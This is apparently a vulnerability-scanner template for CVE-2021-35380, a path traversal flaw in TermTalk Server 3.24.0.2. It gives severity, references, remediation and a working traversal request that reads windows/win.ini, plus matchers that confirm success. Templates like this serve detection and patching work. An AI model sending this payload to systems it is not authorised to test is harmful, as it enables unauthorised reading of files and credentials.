TermTalk Server 3.24.0.2 - Local File Inclusion

id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
    - https://www.swascan.com/it/security-blog/
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    epss-score: 0.45222
    epss-percentile: 0.97404
    cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: solari
    product: termtalk_server
  tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari

http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a004830460221009072fe1d0473fca0a0eec04089db37692674bb003d19077f1abe104a7de5f13e022100ca18722c70eaec2a2d9498923f1f2b1688a806fbcc4e6d16d2a20629e772d968:922c64590222798bb761d5b6d8e72950